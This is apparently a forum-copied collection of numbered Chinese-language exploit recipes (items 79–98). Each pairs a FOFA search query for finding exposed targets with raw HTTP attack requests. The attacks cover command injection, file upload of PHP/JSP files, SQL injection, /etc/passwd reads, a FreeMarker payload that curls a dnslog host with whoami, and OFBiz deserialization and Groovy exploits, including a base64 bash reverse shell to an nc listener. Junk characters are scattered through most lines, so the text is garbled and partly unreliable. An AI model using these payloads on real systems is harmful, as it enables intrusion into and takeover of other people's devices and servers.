( H& O/ r! l9 `$ i: Q2 l8 c( T7 e8 u4 W4 n/ n
( A- Y$ y G6 ~; z. \
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1$ M- T/ J( l- F$ Z
Host: x.x.x.x$ R8 z4 u- d0 [9 h
5 U9 ~- I; |8 ^1 I9 H" R
! {0 v; m6 w& M# T% a( [79. BYTEVALUE 百为流控路由器远程命令执行
9 d8 h) z- o6 v. f0 r; X# @1 n: |FOFA:BYTEVALUE 智能流控路由器
/ v* M, f3 Y- f% t- X) F& vGET /goform/webRead/open/?path=|id HTTP/1.1$ h6 l! C* o. y' X
Host:IP/ Q9 p3 t" N9 V% Q, s6 y5 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.02 D- j$ J5 |- R' ~* G0 y" s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! M4 i! I0 B c9 G4 @3 KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; I0 E9 n: F3 ~5 D: J
Accept-Encoding: gzip, deflate
3 v2 B; r+ s3 @2 H! OConnection: close: r1 B( p! |8 @
Upgrade-Insecure-Requests: 1. Q5 x: e2 e9 _ b: r
# [, ~/ g; w9 F: C4 G- j4 d1 V
9 ]: H) J# @; O+ q/ g, d$ ]5 ~80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
' n7 F3 e& b* o& g+ c, vFOFA:app="速达软件-公司产品"
5 @. I! Z# V& y3 S: c, v3 Q4 Z. wPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
- |# s& C7 P0 L3 l1 NHost: x.x.x.x, f' r6 N0 u; a/ y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! O" ~4 s, @# C& N
Content-Length: 27' d! N) N8 `( e% R0 C8 W* ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 p' @& A z' ^. u0 hAccept-Encoding: gzip, deflate6 w" i/ _! y1 {8 C% N' K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) ?% _% i, t: a' s2 TConnection: close: p: \" c% G- p- t/ q* m
Content-Type: application/octet-stream% K* S" a1 V2 `1 {' i
Upgrade-Insecure-Requests: 1
3 f, H; i" v0 k* r4 n% S) E$ v! D: L* j) ?6 B( r
<% out.print("oessqeonylzaf");%>- H1 l2 M7 Z& x6 u5 K$ K, R M( _
! H) D3 l) W( x& s* C! a5 y
8 i" R: f I6 ?2 m6 OGET /xykqmfxpoas.jsp HTTP/1.1
' d/ Z7 {! u% f3 UHost: x.x.x.x
) d" I: L, o9 B$ j* jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) w4 e& {# ~: P8 B+ Y2 ^
Connection: close8 q" ~3 k: G* R* o
Accept-Encoding: gzip
6 L+ i+ j& Y5 o$ G ]2 W' d' o0 `: r; ]6 I6 h/ L& s
3 J" N# f) E! u( R, N( p' f
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
5 k/ J5 E5 z, P2 M6 mFOFA:app="uniview-视频监控"1 _9 a1 ~1 i5 m0 w
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
- v6 z! b, O" B7 SHost: x.x.x.x) {3 l% s8 i; M& f4 V) ^# f! H7 X! m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 p; u6 U6 Q0 m: e; V( x7 F+ R
Connection: close
7 a4 J: K$ w2 G6 N! EAccept-Encoding: gzip
: s8 }! f# N) H6 ^1 t5 U
1 e; r7 x, `5 j5 ?
* Z8 b+ ?) C( ^2 r, z9 C; z6 ]82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行: e, q0 d6 d# ? L# f1 X
FOFA:app="思福迪-LOGBASE"
3 ^% X$ O5 W( W5 p+ O* `1 MPOST /bhost/test_qrcode_b HTTP/1.1
) @6 T- _- E: ^+ }, D% `- s9 ^Host: BaseURL
; y7 l; y1 a# f& V6 ~ uUser-Agent: Go-http-client/1.19 u2 d& t7 _' {# B7 F1 i
Content-Length: 23
: P+ F$ {2 U; I, Z" GAccept-Encoding: gzip R+ i; w& u4 X8 x7 y
Connection: close: w' w+ C% T& {; a" c; n f0 G
Content-Type: application/x-www-form-urlencoded! B$ h1 u1 G3 I4 @0 G
Referer: BaseURL( \% J, J5 K) M3 `- X" f
/ \* H* @. ~% e2 g- U& W/ ?
z1=1&z2="|id;"&z3=bhost! \' I x/ m' E6 M0 K+ L
: g% ]6 y. @2 o! H8 Y5 x/ E2 {5 h. b, P5 c/ s; ?: s/ `
83. JeecgBoot testConnection 远程命令执行
& v! E) P: b; A5 I$ t& ZFOFA:title=="JeecgBoot 企业级低代码平台"
' i. W: b# ~" L6 m' m' o$ {0 h, w+ K6 Q9 p. p4 |
* r& l3 E5 e4 Y3 p( P; I! rPOST /jmreport/testConnection HTTP/1.15 H1 X3 i) W+ F( u2 i1 t
Host: x.x.x.x
' S7 B/ J/ A$ C2 X' M- n5 c' tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( G F/ t2 H4 R( Z: J2 U$ m5 _# V; `' X
Connection: close8 [" ?+ r# P7 f& n6 d5 {: M5 t8 J
Content-Length: 8881
! p% S6 h) q. m4 Y+ A5 f5 q PAccept-Encoding: gzip$ E; N; A# C' S4 v0 c
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
. u# V3 d. c$ ZContent-Type: application/json! j4 r {: | N
( M& Z6 g5 E- Q" `PAYLOAD
( I5 L1 Z3 j. \* P6 U8 d
: [0 r0 l" L% I$ m, X" `1 N84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
4 c$ I0 Q& s' u i* NFOFA:title=="JeecgBoot 企业级低代码平台"
( [0 l& n6 I: s3 Y
0 Z. }2 s$ V% m3 Y$ ]% r& L. N7 B/ I7 p T; B
5 p/ s4 j6 I( W( m
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
0 U( Q% E# \) S/ W' a% O$ a" aHost: 192.168.40.130:80801 @+ C# M1 z1 A( B8 p4 c+ M' L. ?
User-Agent: curl/7.88.1' ?2 L5 b9 s" G8 y
Content-Length: 156
3 H2 x$ P l1 `4 X8 L: x; SAccept: */*
1 G6 _* T, R% u0 H/ Y! D7 ?5 vConnection: close" X" l& C9 B5 i3 L
Content-Type: application/json$ p* S& F* W* @$ g% u
Accept-Encoding: gzip
9 x: c0 _/ w C! \" V% o6 A/ C0 \$ Q1 }- m" W( {/ O
{6 W9 O [8 M4 J# N y8 p. H
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
% D; z2 G; |8 k* T5 s1 _ "type": "0"1 G7 ]' M' Z; z$ H" K9 g
}! r/ I1 l( ~% a1 B; X7 M% Q8 X
( i/ E1 I t# |5 F
" l- l; H0 ?1 R& n" m3 i
85. SysAid On-premise< 23.3.36远程代码执行4 W8 I6 q l, ^7 W; j: A
CVE-2023-47246, g. W, T/ M8 V+ m b1 @4 s2 l# {" [
FOFA:body="sysaid-logo-dark-green.png" 3 P$ h* \, @% F; k, ?
EXP数据包如下,注入哥斯拉马( J E8 |- S1 Z' J! V% q- q" v2 E
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
$ y' V: q8 P" g% G( B, PHost: x.x.x.x
9 m/ ^3 `: s5 J; dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 P7 F' O. G% t) Y1 X; @: jContent-Type: application/octet-stream
% b# ?* T. k& m- P5 D* bAccept-Encoding: gzip
7 T' ^4 S: j9 M! \" u2 J% i T* E# S& D Y" M6 b
PAYLOAD
: D& ~/ p u2 r: g1 V9 H" ]$ M
- T6 w4 } @ ~7 H) G# Q回显URL:http://x.x.x.x/userfiles/index.jsp
) t% Z# q1 A/ Y, q; B/ Z: z. n F% {, v) ^# c6 T
86. 日本tosei自助洗衣机RCE
G) @ j) M+ {1 C6 GFOFA:body="tosei_login_check.php"
) }; S" t2 u$ y+ R! t; q$ @* yPOST /cgi-bin/network_test.php HTTP/1.1
6 h! M4 p) J' y7 J6 R: U5 h# [Host: x.x.x.x f: A8 m: |" q
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36- b; Z6 @$ A, {1 d. @! a9 V8 Q3 i
Connection: close
# D) F" r, E7 z9 w: J; p8 TContent-Length: 44
1 P8 a. I4 R7 _0 f! c5 `2 FAccept: */*
8 F+ H! A/ t/ k/ K H7 ZAccept-Encoding: gzip: x+ `" w7 T; S/ C B2 I, U1 U r
Accept-Language: en
. o( W, i$ I6 L' u$ N* Q0 hContent-Type: application/x-www-form-urlencoded
3 ]- @! R m* `% n$ \4 M) k$ h- \2 f# d7 R# E6 I0 }; T- h |9 e
host=%0acat${IFS}/etc/passwd%0a&command=ping
0 A& O$ H! F {% r' w
9 P; B7 f4 K/ N5 p4 \) K5 e
* @$ Q1 m8 @+ X5 Y/ M( V* t87. 安恒明御安全网关aaa_local_web_preview文件上传1 Z. I! ~) }3 i% H9 N
FOFA:title="明御安全网关"
1 R& @8 A; \% JPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
3 m- {3 ^6 u+ Y& [. FHost: X.X.X.X8 b9 [" n' Y5 f. J _5 U( N0 i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 [3 G) W7 _# Z2 bConnection: close
! F$ o8 n$ c3 t1 o5 X! u2 PContent-Length: 1982 A; l" y& E4 X& h# ?9 D
Accept-Encoding: gzip
4 q. O4 d M! P$ F# ^Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
, \9 `' ^3 n7 ], J2 F# E( a3 e, l
/ N( H9 `6 Z; F; v: I--qqobiandqgawlxodfiisporjwravxtvd5 s. L1 d; D1 M" N
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
* h, Y/ k$ k, f y! |Content-Type: text/plain* f' j2 a' ?, s, @; n8 X
0 ^, u3 d" {) W0 r3 K% ?( j
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
, {1 {; Q4 v3 D% D- d$ n2 g--qqobiandqgawlxodfiisporjwravxtvd--
F* W6 t% D) {& B0 L/ h5 Z& U% t8 H3 y# g3 [/ u$ Y! l
+ T) J* w& _3 I( n! I3 g) T5 W1 V/ H/jfhatuwe.php3 A. [9 w3 C# N
. _( J% W4 d+ L, S* Y
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
2 `$ [1 b) y( a* oFOFA:title="明御安全网关"
4 T1 \ g3 _3 @) uGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1+ M: [6 M& Z& |+ A) M' w
Host: x.x.x.xx.x.x.x, @! k. L8 ^1 m: Z: C. H5 D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- z6 b- \6 A* \9 K" H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! \; k+ U8 ^5 j8 [, b0 ~+ ^Accept-Encoding: gzip, deflate3 f% e: D/ d* z2 y `" F, l+ n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' ?- _- }( f( _4 l) S: gConnection: close
) M" W( }% s5 b/ c9 _9 | C# Q4 G F6 G+ D; j8 L# k2 t5 t
! g6 X5 R' S5 O0 `- `% z [/astdfkhl.php2 Y+ z; n/ ~& R. q9 H8 V
: a" y4 o- B" L' ]& ~6 c7 m: ]
89. 致远互联FE协作办公平台editflow_manager存在sql注入
- K: }2 d6 h- J, uFOFA:title="FE协作办公平台" || body="li_plugins_download"
7 ?* l+ _& W, o9 ?$ i- g) `# b! DPOST /sysform/003/editflow_manager.js%70 HTTP/1.1( P! O* Z% {5 g
Host: x.x.x.x
, C2 P# N% ~- v; v. f" N+ |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 B" ?2 f% g3 `3 J& s' ?4 W
Connection: close
6 l/ ?2 V6 M( |9 PContent-Length: 41& p; ]2 x& m0 ]; I |
Content-Type: application/x-www-form-urlencoded$ Y, X- p4 L4 p3 ^( [: k
Accept-Encoding: gzip! @2 p# i8 D9 ]/ n
( j; u, ]: }0 b) a0 g6 o) R
option=2&GUID=-1'+union+select+111*222--+$ G& r2 H! q8 R+ Y6 v
; }- _$ F, D6 _$ w3 L& @1 b' k* h) n' n
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
7 j$ H' M% h- d) n K; x. UFOFA:icon_hash="-1830859634"
- e- s2 R8 \; y! a t& U+ tPOST /php/ping.php HTTP/1.10 H/ d5 V6 G$ C, z, v( x
Host: x.x.x.x
5 S! f" o4 A. bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0- f; r7 C$ r* Y( \2 h! [, j
Content-Length: 51
4 T/ s! W8 t/ }( c3 H' aAccept: application/json, text/javascript, */*; q=0.01
/ U& K$ N; t$ N) D( jAccept-Encoding: gzip, deflate: U% y S- O: X. ^4 ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 j1 P1 ?! i; V6 Z4 F: N
Connection: close( i8 o0 {. b" u [
Content-Type: application/x-www-form-urlencoded8 z) O( ^& d8 H/ A
X-Requested-With: XMLHttpRequest! I& P( g+ U) v! j3 ?
2 c0 e) i+ u1 R( N- I
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
. ?! D5 Q' C- }; M9 ]9 X" p: @) A1 t/ J% Z
! x; K. x P: z+ e$ }
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
$ X- Q5 o1 r( IFOFA:title="综合安防管理平台"
; Z- S) P y+ v6 D0 \GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1 t: G0 E1 l1 u& s- n) g
Host: your-ip5 u4 `- G- v1 l) [/ [% |# t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36; r9 | @7 l) d" W, ?. {6 s
Accept-Encoding: gzip, deflate. a$ R4 H6 h+ e$ S, e4 r/ V
Accept: */*
- |% Y& |' p0 z/ W0 a# i3 X: iConnection: keep-alive
" L7 a" j' [- e
0 k2 {1 A# B; I0 f* Y8 p \# ?; v# v
# n0 s4 _$ E1 q92. 海康威视运行管理中心session命令执行! v4 r' g7 S0 Z# o: Z0 S
Fastjson命令执行0 H* ?& Z& e# E7 H) N
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
+ G) ^1 v: e, Q+ IPOST /center/api/session HTTP/1.1. g3 _+ ~" i! G6 g) b% m3 m$ |9 s r7 I( h
Host:
/ E4 `9 a5 ?$ {6 ?Accept: application/json, text/plain, */*, _/ h' d/ Q- h; J+ n% Z' S
Accept-Encoding: gzip, deflate M) U4 T$ Z9 t2 N" E6 r
X-Requested-With: XMLHttpRequest
3 L: \) e- p& j7 A# ZContent-Type: application/json;charset=UTF-82 e& ?# T5 M a/ s; k
X-Language-Type: zh_CN
5 s, G3 r- i. g$ h3 w. kTestcmd: echo test2 d7 P0 B6 _( X5 g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.361 w* X- o. I9 O; {/ W
Accept-Language: zh-CN,zh;q=0.90 c2 H( x" e9 B$ h. s
Content-Length: 5778
: J' D7 R+ z( r! \; S0 h
7 m) t3 [" y: B% F& H' _PAYLOAD
" m; d K0 E- v2 e! V* i, g- _' v0 V- I
% I4 a' a: ~# o' `0 d: N) r/ w9 s93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
, y* G- H0 l5 L' j* iFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="/ J) |1 s& ~3 n: M& O) h' d
POST /?g=app_av_import_save HTTP/1.1
z+ [$ |- b$ v+ KHost: x.x.x.x
$ f+ j$ ?" Y( _+ zContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx; E8 _( p6 f# Y8 S0 N* o
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* F U1 T, C- s# u. A
: y W. K4 c) o( U S) P------WebKitFormBoundarykcbkgdfx5 b: S% T( l4 u" v
Content-Disposition: form-data; name="MAX_FILE_SIZE"1 Q5 d4 [$ b- s: J& w8 A+ [
& N I M5 L6 _0 G10000000
3 r: ~) |+ z: t$ \. t, [------WebKitFormBoundarykcbkgdfx9 I: j0 C, m6 F, y* G. `0 M
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
3 h" r4 ?! l% s1 ZContent-Type: text/plain
" t. z# L i: g r% m" z M, b* \
wagletqrkwrddkthtulxsqrphulnknxa) E& H6 \( X) y* L6 f U
------WebKitFormBoundarykcbkgdfx
3 @9 [! Q; M4 w( bContent-Disposition: form-data; name="submit_post"
% R6 t, F" t2 F
! y- |6 x' k7 }* j% Dobj_app_upfile
' _$ ]+ _- o Q3 M( ?------WebKitFormBoundarykcbkgdfx0 [$ H' }: p0 M" r' E
Content-Disposition: form-data; name="__hash__"$ x2 l7 q1 B1 N o7 `% `
9 V( k# K( h3 c/ t4 s0b9d6b1ab7479ab69d9f71b05e0e9445! v( J! A5 |+ G: m n& d, p
------WebKitFormBoundarykcbkgdfx--
& x5 v) v. l$ q' h8 N' y; a: ?, J4 A8 J
; ]+ n: z2 s- i5 d$ R/ w5 f
GET /attachements/xlskxknxa.txt HTTP/1.1+ z' e$ r, P' S% {+ |* f+ H! O
Host: xx.xx.xx.xx
* \/ f, c* }8 {" c0 S! R% w0 sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ |/ p0 a" E1 V: k3 D7 O( v! O% m* M/ y: K/ t
, s3 b ]" X% [2 D5 V94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
" S. [7 {0 x$ C hFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
|: ^9 d% O9 \% ?POST /?g=obj_area_import_save HTTP/1.1
! t O/ p7 h5 n, T! N& b }# m$ cHost: x.x.x.x& n8 Y% w7 I3 {. g- B# H8 O/ Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt0 b* f; U N2 ^% [0 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.360 O/ K. f8 K- U( S
6 F$ ?/ L0 ?$ c# V: M
------WebKitFormBoundarybqvzqvmt; @+ R2 `' x7 j. A# R2 h
Content-Disposition: form-data; name="MAX_FILE_SIZE"+ C1 e' Q% V. H4 d+ V& P
' x, W V7 Y2 `! A10000000) N" }. `0 l% K0 A1 D
------WebKitFormBoundarybqvzqvmt+ G. W [ a8 j$ g
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt", e1 f" a+ ?3 r& d& P# V
Content-Type: text/plain
% k" W7 v, |5 J4 N& K- k K! d+ x1 w$ {( Y5 h0 P' g* P
pxplitttsrjnyoafavcajwkvhxindhmu9 ~# Q% S+ _ m4 B
------WebKitFormBoundarybqvzqvmt
% J# C3 j) S9 v0 q- X, OContent-Disposition: form-data; name="submit_post"+ q6 O% H% t4 D) o Z# i. `- [
5 G+ r6 g0 ^" C* ?) t' F: ~# |4 lobj_app_upfile
1 D) j' a3 c6 }! A------WebKitFormBoundarybqvzqvmt: [4 ]1 n/ w" \& F' X. j& X
Content-Disposition: form-data; name="__hash__"
7 F R; A9 K" p2 y0 D2 `- G6 W: h" s _2 u
0b9d6b1ab7479ab69d9f71b05e0e9445( E) n5 ?9 R( E% k0 P4 O, o7 y2 c
------WebKitFormBoundarybqvzqvmt--
w/ t' [5 A# v! T' A( e/ B. ` J% C# k) W* O) T
4 f- n0 L, U1 T
% {0 p3 P+ q! S5 V. X E
GET /attachements/xlskxknxa.txt HTTP/1.1
/ C" C1 x' U8 ~ R3 eHost: xx.xx.xx.xx
4 O, ]2 s) K5 |7 PUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36/ [6 Y* n$ X8 x% u6 G# O
' ?# b7 Q6 G; `7 J) b
7 v5 v5 r7 J: p. ?7 v/ G/ b0 v R$ {( c5 u: S* J3 [
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
! B/ L) R/ l3 q0 L# z' xCVE-2023-490707 z$ r H& a% {& M" J
FOFA:app="Apache_OFBiz"; s1 e- k/ `- m! h2 p% i, @
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
" x) w) z, k9 O8 x7 m& y. CHost: x.x.x.x
. M& ~# F% \& G' y' n5 J, d. HUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.366 D, j0 t/ |& V4 ]; B
Connection: close+ P& ^; n; b3 }& \$ n' C) t
Content-Length: 889
* Y- ?/ Y) ?& n+ U( W" h; zContent-Type: application/xml& U% I) j( S/ m) e& W1 l$ y
Accept-Encoding: gzip6 [5 X) s* K4 ?- ?/ v1 N. Z/ q
$ ^- q) |* W9 n4 v0 R
<?xml version="1.0"?>
( Y; I( n' O- k; F; V. i. ]<methodCall>2 @ a8 N; L2 }8 t! H1 R
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
3 a0 v7 X' ~9 j9 }" ~ <params>
5 K$ f: {. d, i* t/ l( d+ } <param>! d. m+ D0 t9 I" \0 w
<value>5 j1 y' B& `* }
<struct>1 q* E) o3 r( J9 d
<member>
^! X, m( {) x2 V <name>test</name>
- E2 w! v3 F7 g! o+ i4 h6 b <value>
8 j' B: X9 u9 u <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable># x& K8 J9 ?& ]+ A% P* G" z, S3 k
</value>; F7 J! Y# W3 T" J# i# A
</member>! q H8 l, p: k+ w
</struct>! v1 J6 j8 l" m/ n# V( H3 b
</value>$ ^1 ^4 R$ f9 Z2 C$ T) s
</param>
/ N8 [. \- K% E8 U* o$ p! d </params>
1 Z% Y0 J1 o: M/ I( b4 u' z</methodCall>+ T) l% f9 Z0 G5 p3 |1 E+ ?9 B
. F% [* Z5 N+ q# X2 v( i2 P# B9 j
8 L" ~7 f. d# E& U用ysoserial生成payload
! |3 @" P: Z! Zjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
; u7 w/ F7 W8 B! D0 }/ T' c& W# f
/ S. T! q9 ` w* W" W: m! y' |& `0 x0 r: A. R8 S
将生成的payload替换到上面的POC
) Q0 M* ~( U) D$ `& t! H$ \3 e$ t$ I. r% dPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
; ^* P3 o0 i4 p! a3 x7 kHost: 192.168.40.130:8443
% V f% M2 N# sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
) E. ^; u) _ J" [& aConnection: close M5 G2 V- m- R
Content-Length: 889
+ n, Q. v9 |8 r) i4 W0 q6 n* a! dContent-Type: application/xml
& z6 l: K( o) g; ]6 iAccept-Encoding: gzip
# b( u1 C, D- A' A' ^, B" \. M5 r* Z+ K3 T9 }' ~( Y
PAYLOAD& F* V2 ]) S2 s% z B
; D9 t! Q: U9 A# q- P# @8 @7 T1 ^
96. Apache OFBiz 18.12.11 groovy 远程代码执行
: a @3 q2 P+ R1 a% d( VFOFA:app="Apache_OFBiz"
( u) ]+ K" x) B: kPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
5 r9 c+ e" P$ t1 g* i5 \ }, g, XHost: localhost:8443& R3 B/ P$ f3 x6 \5 p. ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
' O6 f( e3 Q3 k( ?- TAccept: */*
, i! T1 t; u) b/ R- PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ n1 a* C+ v7 F( x2 NContent-Type: application/x-www-form-urlencoded* e) U. p+ n2 A" m. y
Content-Length: 55
! {8 _ X- B+ `, j+ k( Z5 P" q
4 q6 `+ z% O4 P8 P; _groovyProgram=throw+new+Exception('id'.execute().text);
* d1 V$ R) S; V: ^7 V; _0 d! K. ]' F5 _: k' o6 B' R% Z6 C" S9 O
7 c3 K* k4 m" [. p2 O, v反弹shell* n! u& ^7 Y, Z+ k! d
在kali上启动一个监听
: H" \8 Z3 R9 }( m! ]# E7 }nc -lvp 7777
. q( `" ?4 j) A' ?2 s6 m; L7 G
5 I& R* \8 f7 O( P: e' jPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1' C# d# K& T! T. S3 O
Host: 192.168.40.130:8443
1 y7 c- o; q0 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
3 @3 N* N. N$ X( X3 EAccept: */*' C$ L* f0 G1 ~6 ~9 I2 S; t* s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! n; U1 B: \3 W- Y/ [
Content-Type: application/x-www-form-urlencoded
- s* ^5 ], F5 G. D3 AContent-Length: 71+ |. h" x. f% Z' S& V, c" P6 W
- O4 u4 ?. w9 v" m$ @7 Y
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
- x# A( C k: f# w
7 T8 w; q- @* p& D$ D! u; R# l- C$ n97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
2 I) r2 Z* v( e UFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"4 o) O: b: k: C7 a$ k, L6 x
GET /passport/login/ HTTP/1.1
# F6 R" h; Q8 K8 yHost: 192.168.40.130:8085
" A2 T0 j1 W3 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& X* D* B2 }* m4 h6 Y
Accept-Encoding: gzip; B% N: j- e: g* p
Connection: close/ G m5 l) I7 ^
Cookie: rememberMe=PAYLOAD8 Q6 X2 w# R6 ^& G- t H
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
2 [: |/ e; F1 l$ U% T' h9 p* B# L! @1 ?2 n
# C, n2 o" L3 m, A' k1 ]( p0 O98. SpiderFlow爬虫平台远程命令执行
; y _* M+ ^% P) RCVE-2024-01953 K, F$ H% s) F" W m4 f
FOFA:app="SpiderFlow"; U8 b5 ]! F+ ]7 o
POST /function/save HTTP/1.1
& c. s6 b" j) Q9 T* lHost: 192.168.40.130:8088& E' n( \ [* G4 T0 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
6 c V0 m* g, t- z2 l5 w( {Connection: close
2 z e2 j' F+ j# |Content-Length: 121
1 d% H- A7 J+ b% j T H/ H' ^Accept: */*
5 ]1 m N2 ^0 x+ e( ^Accept-Encoding: gzip, deflate* K7 y( |, ? F( X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 O. K; u( B0 T7 ]' }0 ]* ]7 [
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
